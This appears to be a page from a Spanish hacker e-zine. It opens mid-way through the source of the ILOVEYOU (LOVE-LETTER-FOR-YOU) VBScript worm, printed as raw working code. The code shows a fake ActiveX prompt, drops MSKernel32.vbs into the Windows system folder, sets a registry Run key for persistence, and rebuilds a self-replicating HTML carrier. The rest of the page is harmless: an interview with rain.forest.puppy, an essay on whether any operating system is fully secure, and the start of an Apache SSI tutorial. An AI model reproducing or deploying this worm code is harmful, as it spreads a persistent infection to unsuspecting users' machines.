"]-]<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>]-]&vbcrlf& _"&vbcrlf& _
"]-]<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> ]-]&vbcrlf& _"&vbcrlf& _
"]-]<?-?BODY><?-?HTML>]-]&vbcrlf& _"&vbcrlf& _
"]-]<SCRIPT language=@-@JScript@-@>]-]&vbcrlf& _"&vbcrlf& _
"]-]<!--?-??-?]-]&vbcrlf& _"&vbcrlf& _
"]-]if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}]-]&vbcrlf& _"&vbcrlf& _
"]-]?-??-?-->]-]&vbcrlf& _"&vbcrlf& _
"]-]<?-?SCRIPT>]-]&vbcrlf& _"&vbcrlf& _
"]-]<SCRIPT LANGUAGE=@-@VBScript@-@>]-]&vbcrlf& _"&vbcrlf& _
"]-]<!--]-]&vbcrlf& _"&vbcrlf& _
"]-]on error resume next]-]&vbcrlf& _"&vbcrlf& _
"]-]dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit]-]&vbcrlf& _"&vbcrlf& _
"]-]aw=1]-]&vbcrlf& _"&vbcrlf& _
"]-]code=]-]"&vbcrlf& _
"dta2=]-]set fso=CreateObject(@-@Scripting.FileSystemObject@-@)]-]&vbcrlf& _"&vbcrlf& _
"]-]set dirsystem=fso.GetSpecialFolder(1)]-]&vbcrlf& _"&vbcrlf& _
"]-]code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))]-]&vbcrlf& _"&vbcrlf& _
"]-]code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))]-]&vbcrlf& _"&vbcrlf& _
"]-]code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))]-]&vbcrlf& _"&vbcrlf& _
"]-]set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)]-]&vbcrlf& _"&vbcrlf& _
"]-]wri.write code4]-]&vbcrlf& _"&vbcrlf& _
"]-]wri.close]-]&vbcrlf& _"&vbcrlf& _
"]-]if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then]-]&vbcrlf& _"&vbcrlf& _
"]-]if (err.number=424) then]-]&vbcrlf& _"&vbcrlf& _
"]-]aw=0]-]&vbcrlf& _"&vbcrlf& _
"]-]end if]-]&vbcrlf& _"&vbcrlf& _
"]-]if (aw=1) then]-]&vbcrlf& _"&vbcrlf& _
"]-]document.write @-@ERROR: can#-#t initialize ActiveX@-@]-]&vbcrlf& _"&vbcrlf& _
"]-]window.close]-]&vbcrlf& _"&vbcrlf& _
"]-]end if]-]&vbcrlf& _"&vbcrlf& _
"]-]end if]-]&vbcrlf& _"&vbcrlf& _
"]-]Set regedit = CreateObject(@-@WScript.Shell@-@)]-]&vbcrlf& _"&vbcrlf& _
"]-]regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@]-]&vbcrlf& _"&vbcrlf& _
"]-]?-??-?-->]-]&vbcrlf& _"&vbcrlf& _
"]-]<?-?SCRIPT>]-]"&vbcrlf& _
"dt1=replace(dta1,chr(35)&chr(45)&chr(35),]-][-[]-])"&vbcrlf& _
"dt1=replace(dt1,chr(64)&chr(45)&chr(64),]-]]-]]-]]-])"&vbcrlf& _
"dt4=replace(dt1,chr(63)&chr(45)&chr(63),]-]/]-])"&vbcrlf& _
"dt5=replace(dt4,chr(94)&chr(45)&chr(94),]-]%-%]-])"&vbcrlf& _
"dt2=replace(dta2,chr(35)&chr(45)&chr(35),]-][-[]-])"&vbcrlf& _
"dt2=replace(dt2,chr(64)&chr(45)&chr(64),]-]]-]]-]]-])"&vbcrlf& _
"dt3=replace(dt2,chr(63)&chr(45)&chr(63),]-]/]-])"&vbcrlf& _
"dt6=replace(dt3,chr(94)&chr(45)&chr(94),]-]%-%]-])"&vbcrlf& _
"set fso=CreateObject(]-]Scripting.FileSystemObject]-])"&vbcrlf& _
"set c=fso.OpenTextFile(WScript.ScriptFullName,1)"&vbcrlf& _
"lines=Split(c.ReadAll,vbcrlf)"&vbcrlf& _
"l1=ubound(lines)"&vbcrlf& _
"for n=0 to ubound(lines)"&vbcrlf& _
"lines(n)=replace(lines(n),]-][-[]-],chr(91)+chr(45)+chr(91))"&vbcrlf& _
"lines(n)=replace(lines(n),]-]]-]]-]]-],chr(93)+chr(45)+chr(93))"&vbcrlf& _
"lines(n)=replace(lines(n),]-]%-%]-],chr(37)+chr(45)+chr(37))"&vbcrlf& _
"if (l1=n) then"&vbcrlf& _
"lines(n)=chr(34)+lines(n)+chr(34)"&vbcrlf& _
"else"&vbcrlf& _
"lines(n)=chr(34)+lines(n)+chr(34)&]-]&vbcrlf& _]-]"&vbcrlf& _
"end if"&vbcrlf& _
"next"&vbcrlf& _
"set b=fso.CreateTextFile(dirsystem+]-]%-%LOVE-LETTER-FOR-YOU.HTM]-])"&vbcrlf& _
"b.close"&vbcrlf& _
"set d=fso.OpenTextFile(dirsystem+]-]%-%LOVE-LETTER-FOR-YOU.HTM]-],2)"&vbcrlf& _
"d.write dt5"&vbcrlf& _
"d.write join(lines,vbcrlf)"&vbcrlf& _
"d.write vbcrlf"&vbcrlf& _
"d.write dt6"&vbcrlf& _
"d.close"&vbcrlf& _
"end sub"&vbcrlf& _
""
set fso=CreateObject("Scripting.FileSystemObject")
set dirsystem=fso.GetSpecialFolder(1)
code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))
code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))
code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))
set wri=fso.CreateTextFile(dirsystem&"\MSKernel32.vbs")
wri.write code4
wri.close
if (fso.FileExists(dirsystem&"\MSKernel32.vbs")) then
if (err.number=424) then
aw=0
end if
if (aw=1) then
document.write "ERROR: can't initialize ActiveX"
window.close
end if
end if
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
//-->
</SCRIPT>

<-- LOVE-LETTER-FOR-YOU.HTM -->


Comentarios enviarlos a: 
 <script language='JavaScript' type='text/javascript'>
 <!--
 var prefix = 'mailto:';
 var suffix = '';
 var attribs = '';
 var path = 'hr' + 'ef' + '=';
 var addy4123 = 'd0ct0r_x' + '@';
 addy4123 = addy4123 + 'hven' + '.' + 'com' + '.' + 've';
 document.write( '<a ' + path + '\'' + prefix + addy4123 + suffix + '\'' + attribs + '>' );
 document.write( addy4123 );
 document.write( '<\/a>' );
 //-->
 </script><script language='JavaScript' type='text/javascript'>
 <!--
 document.write( '<span style=\'display: none;\'>' );
 //-->
 </script>Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 <script language='JavaScript' type='text/javascript'>
 <!--
 document.write( '</' );
 document.write( 'span>' );
 //-->
 </script>
flames enviarlos a : /dev/null o a 
 <script language='JavaScript' type='text/javascript'>
 <!--
 var prefix = 'mailto:';
 var suffix = '';
 var attribs = '';
 var path = 'hr' + 'ef' + '=';
 var addy85488 = 'chavez-mvr' + '@';
 addy85488 = addy85488 + 'hotmail' + '.' + 'com';
 document.write( '<a ' + path + '\'' + prefix + addy85488 + suffix + '\'' + attribs + '>' );
 document.write( addy85488 );
 document.write( '<\/a>' );
 //-->
 </script><script language='JavaScript' type='text/javascript'>
 <!--
 document.write( '<span style=\'display: none;\'>' );
 //-->
 </script>Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 <script language='JavaScript' type='text/javascript'>
 <!--
 document.write( '</' );
 document.write( 'span>' );
 //-->
 </script>
DoctorX <
 <script language='JavaScript' type='text/javascript'>
 <!--
 var prefix = 'mailto:';
 var suffix = '';
 var attribs = '';
 var path = 'hr' + 'ef' + '=';
 var addy71761 = 'd0ct0r_x' + '@';
 addy71761 = addy71761 + 'hven' + '.' + 'com' + '.' + 've';
 document.write( '<a ' + path + '\'' + prefix + addy71761 + suffix + '\'' + attribs + '>' );
 document.write( addy71761 );
 document.write( '<\/a>' );
 //-->
 </script><script language='JavaScript' type='text/javascript'>
 <!--
 document.write( '<span style=\'display: none;\'>' );
 //-->
 </script>Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 <script language='JavaScript' type='text/javascript'>
 <!--
 document.write( '</' );
 document.write( 'span>' );
 //-->
 </script>>
http://www.hven.com.ve/hvlinux  HVLINUX
http://www.hven.com.ve          HVen
http://labx.tsx.org             LABX


   ͻ
͹ Entrevista con RFP ͹Tito_C
   ͼ

                   ..:: Entrevista con rain.forest.puppy ::..
                         Por Tito_C <
 <script language='JavaScript' type='text/javascript'>
 <!--
 var prefix = 'mailto:';
 var suffix = '';
 var attribs = '';
 var path = 'hr' + 'ef' + '=';
 var addy37388 = 'tito_c' + '@';
 addy37388 = addy37388 + 'hven' + '.' + 'com' + '.' + 've';
 document.write( '<a ' + path + '\'' + prefix + addy37388 + suffix + '\'' + attribs + '>' );
 document.write( addy37388 );
 document.write( '<\/a>' );
 //-->
 </script><script language='JavaScript' type='text/javascript'>
 <!--
 document.write( '<span style=\'display: none;\'>' );
 //-->
 </script>Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 <script language='JavaScript' type='text/javascript'>
 <!--
 document.write( '</' );
 document.write( 'span>' );
 //-->
 </script>>

  En  lo  que estoy  tratando  de  que sea  el  inicio  de un  ciclo  de
  entrevistas a personalidades del mundo de la seguridad informatica, en
  nuestra  primera  entrega para HVen EZine No.3, tenemos una entrevista
  con  rain.forest.puppy,  que   como  muchos   sabran  es  uno  de  los
  principales hackers que le dan ultimamente muchos dolores a Micro$oft.
  rain.forest.puppy es el  responsable de encontrar  muchos problemas de
  seguridad en los sistemas NT, ademas de muchos paquetes de software en
  general.

  La entrevista salio un poco  corta lo cual no le quita lo interesante.
  Solo  quiero dejar en claro que  esto es todo real, nada inventado. La
  entrevista se llevo a cabo  mediante e-mail. Para ver la transcripcion
  original de la entrevista en ingles dirijanse a:
  tito.hack3r.com/rfp.txt

----------------------[ Inicio de la entrevista

  1) Primera   pregunta,  la  clasica: como  te   iniciastes   con   las
     computadoras? (primeros pasos, lenguajes de programacion etc.)

  <rfp> Empece con DOS 5.0 en mi i386, utilizando  QBasic (interpretado)
        y QuickBasic (compilado) para programar cosas. Me meti con virus
        para  DOS  en Assembler, y empece a aprender C con un compilador
        en  C freeware (se  me olvido el nombre). A~adi Linux y Novell a
        mi lineup empezando  la universidad y finalmente  a~adi Win95 en
        algun momento del 97 (despues que salio el OSR2)

  2) Como y hace  mas o menos  cuanto tiempo te iniciastes en el aspecto
     de seguridad informatica?

  <rfp> Hmmm...como en el  segundo a~o de  la universidad  se me hubiera
        calificado mas  que todo  como  un "script kiddie"  (*uy*), pero
        hey, hay  que  empezar  en  algun lado.  Despues  empece  mas  a
        preocuparme sobre el por que  de los problemas y empece a  hacer
        cosas originales mias como  por mis a~os finales de universidad.
        Asi  que  como  unos 5 a~os.  Si  quieres  contar  mis  peque~as
        "creaciones" viricas como "seguridad" entonces unos 8-9 a~os.

  3) Algunas  personas  quieren  saber quien es la persona tras el alias
     (trabajo, que te gusta? que no? la vida en general...)

  <rfp> Nadie en especial... solo  otro  tipo mas que no sobresale entre
        la gente, que esta contribuyendo con la comunidad como puede :)

  4) HVen  es un  grupo  bastante orientado  hacia linux, y por lo tanto
     varias personas se hicieron la  pregunta de porque escoger NT sobre
     linux?

  <rfp> Yo no escojo  NT sobre  linux. Mi  preferencia  en  casa y en el
        trabajo es Linux (Mandrake 6.5), he escrito algunos parches para
        el kernel (no publicos), y trabajo con Solaris y AIX en una base
        semi-regular en el trabajo.

        Hay dos aspectos importantes aqui:

        1. Linux, NT, AIX,  Solaris... todos son  herramientas.  Usa  la
           herramienta correcta para el trabajo  de turno. Trato  de  no
           exhibir preferencia por ningun SO.

        2. Es mucho mas facil encontrar huecos en NT... por  eso  es que
           tengo tantos advisories de NT :)

  5) Has  descubierto  algun problema  de seguridad  en linux? (y de NT?
     hehe)

  <rfp> Bueno en  algunos  software  basado en  unix, por ejemplo, el de
        Zeus webserver  fue uno publicado, y he hecho evaluaciones (pero
        no muchas) de codigo para aplicaciones basadas en unix. Pero, en
        lo  que a  unix se  refiere  me enfoco  mas  en el desarrollo de
        herramientas que en evaluaciones de seguridad.

  6) Cual es el problema de seguridad mas comun que has encontrado?

  <rfp> Hmmm... en  general  servicios  superfluos  y  una  ausencia  de
        educacion entre los administradores de sistemas. Especificamente
        bind en Unix (NXT overflow), y snmp y rds en NT.

  7) Se especializo en NT, o tambien trabaja con nix? Si se especializo,
     porque?   Ha   estudiado   algun  sistema  operativo   que  no  sea
     "mainstream"?

  <rfp> Veras, la  cosa es que  yo no me especializo. Le doy a todo pero
        no  soy  maestro  de  nada... no  conozco  ningun  area  a  gran
        profundidad. Asi que si,  estudio todo  tipo de  cosas. Sistemas
        operativos  "no-mainstream"... Hmm desafortunadamente no..  AIX,
        HP-UX, Solaris, IRIX, Linux, *BSD, NT, Novell y cosas como IOS y
        otros artefactos pero nada muy extra~o.

  8) Cual  es  tu  percepcion del mundo de la seguridad hispano (grupos,
     etc.)? Haz trabajado en conjunto con algun grupo?

  <rfp> Se  que hay  mucha gente  talentosa sacando cosas, pero para ser
        sincero no sigo mucho a los grupos..hay demasiados en general :/

  9) Que ves en el futuro del mercado de los SO?

  <rfp> Nada  muy  diferente a lo  de ahora... los productos se seguiran
        cargando y "engordando"... y no solo limitado a los de Redmond..

  10) Que vez en el futuro de  la computacion en general?

  <rfp> Nos  volveremos mas y mas dependientes, la educacion se hara mas
        impractica. La seguridad  se ira  por el ca~o y la gente pensara
        inocentemente lo contrario.

  11) Y finalmente, haz visto HVLinux? (hvlinux.tsx.org) :)

  <rfp> No, pero  ahora si... :) Se ve bastante  bueno, tendre que jugar
        con eso un rato. Y www.hven.com.ve tambien  se ve bastante bueno
        :)
            
------------------------[ EOF

  Para conocer mas de rain.forest.puppy y su trabajo vayan a su site en:
  www.wiretrip.net/rfp Muchisimas gracias a rfp por haber accedido a ser
  entrevistado y a la comunidad de HVen por aportar preguntas.

  Si  quieres ver  en este espacio entrevistas con cualquier persona que
  este  dentro de nuestro  alcance (y que ademas nos parezca interesante
  :) o si simplemente  quieres mandar  comentarios,  preguntas,  etc. no
  dudes en contactarme a mi e-mail: 
 <script language='JavaScript' type='text/javascript'>
 <!--
 var prefix = 'mailto:';
 var suffix = '';
 var attribs = '';
 var path = 'hr' + 'ef' + '=';
 var addy60301 = 'tito_c' + '@';
 addy60301 = addy60301 + 'hven' + '.' + 'com' + '.' + 've';
 document.write( '<a ' + path + '\'' + prefix + addy60301 + suffix + '\'' + attribs + '>' );
 document.write( addy60301 );
 document.write( '<\/a>' );
 //-->
 </script><script language='JavaScript' type='text/javascript'>
 <!--
 document.write( '<span style=\'display: none;\'>' );
 //-->
 </script>Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 <script language='JavaScript' type='text/javascript'>
 <!--
 document.write( '</' );
 document.write( 'span>' );
 //-->
 </script>


   ͻ
͹ Sistemas Operativos 100% seguros II ͹Teken Melocotoff
   ͼ

Sistemas Operativos 100% seguros II: Excepciones Especiales.

  En la  ultima  entrega  de la ezine  de HVen  afirme que  los Sistemas
  Operativos 100% seguros  no  existen. En  este  articulo  no cambio mi
  punto  de vista,  sino que  aunque el  titulo enga~e,  reafirmo mas mi
  tesis,  pero  para  dar  mas  claridad  a  mi  declaracion  hare  unas
  explicaciones.

  Primero  que todo  quiero tratar esto no de un punto de vista tecnico,
  se  podrian  y se  han  dedicado  gigas  en  informacion  que  detalla
  precisamente las  debilidades  de los distintos sistemas, y ademas que
  esta es una situacion abstracta, mas bien un ejercicio mental que algo
  aplicable. Tambien quiero  que se  comprendan unos teoremas que aunque
  no conozca quien los haya  estipulado antes que yo, no deseo llevar el
  credito de ellos, ya que estoy seguro que alguien mas habra pensado en
  ellos milenios antes que yo, literalmente.

  1: Dado suficiente tiempo,  cualquier problema se puede resolver. Esto
     es  evidente, ya que a traves  del tiempo el hombre ha podido sobre
     pasar  cualquier  barrera,  ya  haya   sido  por  la  investigacion
     acumulada, el genio, o  muchos cerebros  trabajando a la  vez en un
     proyecto. Nada es estatico, todo cambia.

  2: Ningun sistema es libre de fallas. Ningun ser es perfecto, perfecto
     Dios, y lo mas  cercano al  ser perfecto es la eternidad de la raza
     humana,  visto como  una sola  entidad. Pero el ser humano en si es
     victima de sus propias debilidades. Por lo  tanto  lo creado por el
     ser humano siempre sera imperfecto.

  3: Por efectos  de este  documento, se obviara  las instancias  de los
     ataques   fisicamente   locales,  y  solo  se  referian  a  ataques
     logicamente locales y remotos.

  4: Se obviaran los DOS. Son ataques a un sistema, y en casos drasticos
     pueden  da~ar la  informacion contenida en la victima, pero  ya que
     no permiten manipular informacion directamente los obviaremos.

  Observando  estos puntos, se puede distinguir el las razones de ser de
  excepciones a la regla, de por que hay instancias de sistemas seguros.
  Les   dare   tiempo   para   que  analicen.  Mientras,  examinemos  la
  selecciones. Como  verificar, o comparar  los sistemas, para saber que
  es seguro, y que no? Bueno no conociendo mejor opcion, les sugiero que
  vean la lista de  clasificacion de la NSA  para comparar. Es obvio que
  esta  lista  no  es  exhaustiva, y  yo  no  pienso  cubrir  todas  las
  situaciones dadas. En todo caso  esa lista  se basa  unicamente  en el
  software, y si acaso hardware, yo en  cambio en este documento planteo
  un analisis en un nivel mas macro. En este  punto pidiese que aquellos
  mejor  informados  me  contactaran  para  ponerme  al  tanto y  ver si
  modifico el documento. 

  Ya analizaron?  Si observan dada las condiciones de suficiente tiempo,
  se puede resolver cualquier problema. Pero para un solo ser humano, el
  tiempo  suficiente  puede  ser de 2 segundos  a dos  siglos.  Dada  la
  limitante que el ser humano muere, es obvio que la condicion de tiempo
  suficiente no se dara  constantemente. Segundo  un problema podria ser
  solucionado mas rapido si el  ente humano  incluyese a todos los seres
  humanos vivos, pero aun asi la limitante de tiempo podria durar varias
  generaciones, si es que se pudiese  coordinar  la eternidad de la raza
  humana. Otra limitante seria La paradoja de Turing (creo que es esa si
  no me equivoco de proponente). La paradoja de Turing indica que el ser
  humano no pude llegar a  comprender la eternidad del  la mente humana,
  ya que el estudio de la misma crearia nuevas formas de pensar, creando
  un ciclo. Por lo tanto, el ser humano no puede ver todas  las opciones
  posibles, porque al intentar hacerlo creara mas posibilidades (tambien
  es la razon por la cual no se puede crear un sistema que emule al 100%
  al ser humano.)

  Un  poco  confuso no?  Veamoslos  de  punto  distinto.  Si  se  da una
  situacion en  la cual el  tiempo es menos de lo necesario, y que no se
  pueden  observar   todas  las  posibilidades,  ya  sea  por  falta  de
  investigacion, poder mental, o  multiples  perspectivas de cual atacar
  el problema, se observa que se da el  resultado que hay situaciones en
  cual EL PROBLEMA NO TIENE SOLUCION.

  Apliquemos  esto  con ejemplos  concretos.  No hace 5 a~os  se hizo un
  concurso  que  detallaba  lo siguiente: Se ofrecia  ,000 para aquel
  que pudiese hackear  (leer  como "no -DOSear") un  servidor  Macintosh
  corriendo el software  servidor de paginas html Webstar. Nadie lo pudo
  lograr.  El  limite  de  tiempo era  de 45 dias. Hace  falta  destacar
  tambien que muchos de los que intentaron atacar al sistema lo atacaron
  como si fuese un sistema unix.

  Por  lo tanto la limitante del  tiempo y la falta de  conocimiento (la
  especificacion  tecnica sobre  el servidor  estaba en  el site), y  el
  hecho que  solo se estaba  corriendo el  servidor web hizo que HACKEAR
  ESE SERVIDOR FUESE IMPOSIBLE.

  Ahora  eso fue 5 a~os atras, y yo la  verdad no estoy  actualizado con
  las  tecnicas de hackeo en contra de Macs, asi que no puedo afirmar si
  la situacion todavia se da.

  Ahi se  demostro  que un  sistema  puede ser  seguro, a traves  de una
  combinacion de sistema  (software, hardware, configuracion), tiempo, y
  conocimiento del  atacante. En este caso especifico salieron a relucir
  Tiempo y Sistema.  Veamos otro ejemplo  que  unicamente se  enfoque en
  sistema.

        SISTEMA

  El ejemplo mas obvio de proteccion de sistema a ataques de la Internet
  es  que el  primero no  este conectado desde un principio, pero eso es
  demasiado  obvio.  Observando   el  funcionamiento   de  la  Internet,
  observamos que la  Internet se basa  en el esquema CLIENTE / SERVIDOR,
  el cliente siendo aquel  que pide la informacion, y el servidor siendo
  aquel  que reparte la  informacion. Digamos  que  en  nuestro  sistema
  retiramos  el  servidor y solo  dejamos  el  cliente,  y  al  no haber
  servidores, no hay demas usuarios del sistema. Diran que es un ejemplo
  no valido, que no existe tal cosa, pero la  verdad, estoy describiendo
  maquinas  Windows95  (98 en la  mayoria de  los casos) o  Mac  comun y
  corrientes.

/* NOTA:  Se esta hablando de maquinas windows y macs sin NINGUNO de los
servicios de servidor que estos incluyen instalado ni activados, osea la
instalacion COMUN.*/

  Es  decir  no estoy  corriendo  ningun  servidor  de  ningun tipo (eso
  incluye compartir  archivos) asi  que puedo  decir que  estoy  seguro.
  Recuerden que mencione que los ataques dos no se iban a mencionar. Los
  mas vivos por ahi  se acordaran  de java  applets y similares  que son
  malignos,   y   los   viruses  igualmente.  Pero  todo  eso  viene  en
  configuracion de sistema. O sea si leo  todo mi  correo  con hotmail o
  similar, nunca  uso el outlook, desactivo  la depuracion VB,  y uso un
  browser  que  no sea  Explorer (es mas si uso uno a base de texto esto
  100% seguro contra applets) o aun asi, si configuro  bien  el explorer
  para que no me corra cualquier applet, puedo decir que estoy navegando
  en Internet en una maquina 100% segura. Ven que aunque Windows sea una
  porqueria, no se puede negar que  tiene sus beneficios?

        TIEMPO

  Ya vimos un ejemplo de netamente Sistema, veamos ahora una de  tiempo.
  En este ejemplo usaremos una maquina Linux, cualquier sabor, todos los
  parches  corrientes  instalados, telnet, http, mail y ftp abiertos. Yo
  pongo mix box  online, y lanzo  el reto  al aire, que el que hackee mi
  maquina en 5 dias les  dos 1000 por  cada dia que  les falte  antes de
  llegar al limite. Pero, yo sin  avisarle a nadie, reprograme todos los
  binarios y sus opciones, digamos, el  ping sigue  siendo ping pero con
  los flags completamente reconfigurados, y  que el su no pueda hacer su
  a ningun binario  desde un usuario de gid= 0 o uid=0, el  who  retorna
  puros usuarios con uid=0, cambio las opciones del  more, del less, del
  cat del  make etc etc. Cada  uno  sigue  siendo  igual,  pero  con  un
  comportamiento  distinto  al cual usarlo no demoraria en demostrar sus
  cambios.

  El  que ataque  la maquina entrara al sistema con la predisposicion de
  haber  entre  tanto  a un  sistema  linux, y todo  su  conocimiento lo
  reconocera como el  mismo, pero  el sistema  tendra un  comportamiento
  distinto. Esto abre ciertas  avenidas  en la  mente  del atacante, que
  cambie, que no cambie, y como lo cambie. Para poder capturar cualquier
  sistema, se necesita ser experto en el mismo, el atacante en este caso
  podra ser un experto, pero el ambiente ha  sufrido un cambio drastico.
  En aprenderse el comportamiento e identificar los binarios modificados
  se les va como 3 dias (tomemos en cuenta que la gente tiene vida fuera
  del internet.) Luego poder  identificar  una debilidad o una  falla de
  configuracion le tomara de uno a 3 dias. En el mejor de los casos, aun
  asi  tendria que  explotar  la debilidad  osea que se requeriria de un
  hoyo  de gran  magnitud, que  de root de  inmediato, y de esos hay muy
  pocos. Asi  que es muy posible, poniendo un plazo de 5 dias, tener una
  maquina  invicta, en  otras  palabras, en  ese  espacio de 5 dias, una
  maquina imposible de franquear.

        CONOCIMIENTO

  Cuando  deja de  ser un sistema  operativo seguro? En  cuanto otro ser
  humano  tiene  tiempo  para estudiarlo. El tiempo es una limitante que
  muchas veces no  se puede  imponer, pero que  tal el estudio? Si no te
  permito una copia, ni  del codigo  fuente, ni del  binario, hasta  que
  momento deja de ser 100%  seguro? Hasta que entres en contacto con el.
  Y aun asi, esta la limitante de la curva de  aprendizaje. Una curva de
  aprendizaje no es mas que una  visualizacion del tiempo de aprendizaje
  sobre un tema, la mayoria  de la gente  estando en la parte central de
  la curva (contiene la mayor poblacion,  por lo  tanto es el  punto mas
  alto)  habiendo  en la mismas  puntos  extremos de  tiempos  veloces y
  tiempos  lentos  (si  se  visualiza  la forma de una  campana se puede
  comprender  mejor, los extremos  siendo las  orillas de la campana, en
  una grafica el area menos poblada ya que la poblan los casos extremos,
  genios  en un extremo, impedidos  mentales en otro, y el centro siendo
  el lugar donde se encuentra la mayoria de la gente.) Para demostrar el
  punto  de la  curva de aprendizaje usemos unos ejemplos. Acuerdense de
  la primera vez que vieron a Windows95/98. No les demoro mucho aprender
  como usar el  mouse para  activar un programa no?  Es una accion en la
  cual la  curva  de aprendizaje (la mayoria de la gente) domina el tema
  en un par de segundos. A ver, un poco  mas complicado, lleguemos hasta
  nivel  experto  en windows, la modificacion  de  registros. Si  yo  le
  dejase la maquina con windows  preinstalado windows, sin ningun libro,
  ni manual ni mas, la curva de aprendizaje a usar  el registro se puede
  medir desde un a~o a nunca (depende  de la  exposicion  que  tenga  el
  usuario  al  tema  de registro  en windows). Si el  mismo  ejemplo  lo
  repitiera, pero  entrando  libros  que  ilustraran  la utilizacion  de
  windows, desde  basico hasta  experto, la curva  de aprendizaje podria
  ser de 2-3 meses, hasta 6 meses. La situacion cambio drasticamente no?
  Perfecto, y que  tal  un sistema  operativo, completamente distinto al
  windows? La curva  de aprendizaje  para saber usar  linux como usuario
  regular es  de 6 meses, para  poder  administrarlo  bien 1 a~o,  a~o y
  medio. Pero que  tal un  sistema  operativo completamente  distinto, y
  cuyas restricciones hacen  dificil la  exposicion al  mismo?  Con esto
  nombrare un par de sistemas propietarios, tal como:

1	SCO-UNIX
2	HP-UX
3	IRIX
4       XENIX
5       SEVMS VAX VERSIoN 6.1
6	PLAN9
7       INFERNO
8	OS 1100/2200
9	UTS/MLS
10	CX/SX
11      XTS-300 STOP 4.4.2
12	AS/400

  Estos  son  solos  unos  ejemplos.  Todos  estos  sistemas  operativos
  tienen  limitante  de  alto  costo y/o dificil obtencion y/o limitados
  al uso de  cierta poblacion. Hay  gente que me puede decir bastante de
  una maquina SCO, y las HP, y las IRIX. Estos son sistemas comunes y se
  conocen bastante bien,  pero son pocos los que los conocen. Igualmente
  son pocos los que me pueden  decir algo  de las  Vaxen e igual por las
  AS/400. Son  mucho menos  los  que  tan siquiera  han  oido  de PLAN9,
  INFERNO, OS 1100/2200, O UTS/MLS. De pura curiosidad hice una encuesta
  en varios cuartos de irc relacionados a hacking, seguridad, y sistemas
  operativos. Algunos pudieron comentar que  escucharon de algunos, pero
  ninguno pudo decir que ha tenido contacto con estos  ultimos sistemas,
  en cuartos cuya poblacion errase de 10-60. Esto  demuestra que  siendo
  un atacante confrontado con estos sistemas, les sera infranqueable por
  su ignorancia del funcionamiento de los mismos.

  Cabe  destacar que hay varios sistemas calificados seguros aqui, desde
  una  pinche  C2, a  una  muy  considerable  B3. La  direccion  de  las
  calificaciones es:
  http://www.radium.ncsc.mil/tpep/epl/epl-by-class.html
  y ahi podran ver mejor.

  Del Sistema  Operativo mas  seguro hasta  la fecha, el WANG STOP no se
  mucho,  lo poco  que lei  del mismo lo  lei en Maximum Security un muy
  buen libro se lo recomiendo a cualquiera, experto o no.

        CONCLUSIoN

  Reitero  mi apoyo  por mi  tesis principal,  que  no  existe  sistemas
  operativos  100% seguros,  pero  le   a~ado,  que  observando  ciertos
  factores como Sistema,  Tiempo, y Conocimiento,  un sistema  operativo
  puede gozar de una limitada seguridad.

|==========================================|
|            Teken Melocotoff              |                                  
|                                          |
| Escojamos. Seremos lobo, pastor, u oveja |
|            www.hven.com.ve               |                                  
|                                          |
|        public.cwp.net.pa/~jomasa         |                                  
|                                          |
|==========================================|


   ͻ
͹ Server Side Includes (SSI) en Linux ͹kl0nk Manson
   ͼ

----------------------------------------
- Server Side Includes (SSI) en Linux  -
- by kl0nk Manson <
 <script language='JavaScript' type='text/javascript'>
 <!--
 var prefix = 'mailto:';
 var suffix = '';
 var attribs = '';
 var path = 'hr' + 'ef' + '=';
 var addy24820 = 'kl0nk' + '@';
 addy24820 = addy24820 + 'excite' + '.' + 'com';
 document.write( '<a ' + path + '\'' + prefix + addy24820 + suffix + '\'' + attribs + '>' );
 document.write( addy24820 );
 document.write( '<\/a>' );
 //-->
 </script><script language='JavaScript' type='text/javascript'>
 <!--
 document.write( '<span style=\'display: none;\'>' );
 //-->
 </script>Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 <script language='JavaScript' type='text/javascript'>
 <!--
 document.write( '</' );
 document.write( 'span>' );
 //-->
 </script>>   -
- Escrito: 12:59 p.m. 09/05/00         -
- Version: 0.1b                        -
----------------------------------------

  Ustedes se  reguntaran  que  es el SSI, pues bueno es un lenguaje y se
  utiliza  como  una  serie  de etiquetas o TAGS dentro del codigo HTML,
  bueno y para que lo utilizamos:

- Para ahorrar Trabajo y darle dinamismo a una pagina web.
- Para llevar control de las personas que visitan a nuestra pagina
  (Como IP, Hora de Acceso, Tipo de Navegador, etc).
- Y muchas otras opciones!!!.

  Que necesitamos:

- Un Servidor con Unix / Linux.
- Apache Web Server (Preferiblemente).
- Espacio en este Servidor para montar la Web (Ej: /home/kl0nk)

NOTA: Hay  que tener en cuenta para que funcione esto las extensiones de
      las  web  deben  ser .shtml (Secure HyperText Markup Languaje), ya
      que no funciona con extensiones .htm / .html


  Configuracion: Vamos  a  configurar  Apache  Web  Server, nos  vamos a
  /etc/httpd/conf/httpd.conf (Ojo  en  mi  caso  porque  utilizo RED HAT
  LINUX) lo editamos y buscamos la siguiente linea:


#LoadModule includes_module /usr/lib/apache/1.3/mod_include.so


